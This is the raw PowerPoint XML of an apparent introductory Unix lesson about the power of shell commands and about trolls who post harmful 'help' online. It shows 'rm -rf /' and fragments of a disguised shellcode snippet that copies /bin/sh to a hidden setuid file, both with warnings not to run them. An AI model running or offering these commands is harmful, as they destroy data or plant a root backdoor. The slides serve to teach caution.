              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 000 home/20170301-basic-unix/exercise4/mushroom-kingdom/castle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308573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UNIX?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="5195029" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Basis for communicating with tools for handling large amounts of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Including biological data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to communicate with high-performance computing resources (HPC)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="DNA strand wity binary code_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9254" y="1570662"/>
            <a:ext cx="2857500"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7645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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Continuing Education</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lesson 5.1: With Great Power Comes Great Responsibility</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lesson 5.2: Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to get (safe and good) help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Closing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13437139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5.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: With Great Power…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The following slides will show some code that can do very bad things. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DO NOT RUN THE CODE IN THE NEXT SLIDES.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DO NOT RUN THE CODE IN THE NEXT SLIDES.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4300" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DO NOT RUN THE CODE IN THE NEXT SLIDES.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29424463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5.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: With Great Power…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNIX commands can be very, very powerful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you don’t know what code does, LOOK IT UP BEFORE YOU RUN IT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any guesses what this code does? </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(DO NOT RUN IT TO FIND OUT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5124" name="Picture 4" descr="Image result for spiderm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125" y="4869162"/>
            <a:ext cx="1789875" cy="198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7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0" name="Picture 6" descr="Image result for brick wall"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="6587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="915174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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lesson 5.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: With Great Power…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295442" y="1635125"/>
            <a:ext cx="8577337" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This command will recursively delete EVERYTHING it can</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If you are logged in as root user, this means it will delete EVERYTHING on your computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are several</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIX commands that can</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brick your computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Never run code if you don’t</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>know what it does.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Image result for unix philosophy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="6170" t="22893" r="6254" b="22580"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4920712" y="4001294"/>
            <a:ext cx="4014061" cy="187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165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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting Help Online</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2093044"/>
            <a:ext cx="4895850" cy="4590415"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can learn A LOT from reading questions other people had on forums</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can Google your problem – chances are someone has had the same question!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2" descr="http://vignette1.wikia.nocookie.net/fallout/images/c/c0/VaultBoyFO3.png/revision/latest?cb=201108091822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370" y="520755"/>
            <a:ext cx="4633290" cy="4745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2135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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting Help Online</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2093044"/>
            <a:ext cx="4895850" cy="4590415"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can learn A LOT from reading questions other people had on forums</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can Google your problem – chances are someone has had the same question!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2" descr="http://vignette1.wikia.nocookie.net/fallout/images/c/c0/VaultBoyFO3.png/revision/latest?cb=201108091822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370" y="520755"/>
            <a:ext cx="4633290" cy="47453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2825" y="5566216"/>
            <a:ext cx="8532721" cy="1231106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MOST people are nice, helpful, and good, and are very happy to help you!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22351632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 Getting Help Online</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOME people just want to watch the world burn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="Image result for internet tro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361" y="2897340"/>
            <a:ext cx="4933277" cy="2797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8013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 Getting Help Online</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOME people just want to watch the world burn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="Image result for internet tro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361" y="2897340"/>
            <a:ext cx="4933277" cy="27971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 result for tro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315" y="2577384"/>
            <a:ext cx="6874158" cy="3437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2321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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting ‘Help’ Online</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What do you think would happen if you ran this code in the console? </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(DO NOT RUN THIS CODE IN THE CONSOLE TO FIND OUT)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3474720"/>
            <a:ext cx="7629012" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[] __attribute__ ((section(“.text”))) /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e.s.p</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release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xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x3e\x5b\x31\xc0\x50\x54\x5a\x83\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x64\x68”</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\x68\</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\xd0\</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\xd9\x68\x8d\x99”</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\x81\x68\x8d\x92\</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\xd2\x54\x5e\xf7\x16\xf7”</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“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”</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“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x80\x31”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“\xc0\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xf9\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xbd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\x2f\x62\x69”</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“\x6e\x2f\x73\x68\x00\x2d\x63\x00”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cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh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/.beyond; </a:t>
            </a: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4755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/.beyond;”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14596300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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting ‘Help’ Online</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3474720"/>
            <a:ext cx="7629012" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
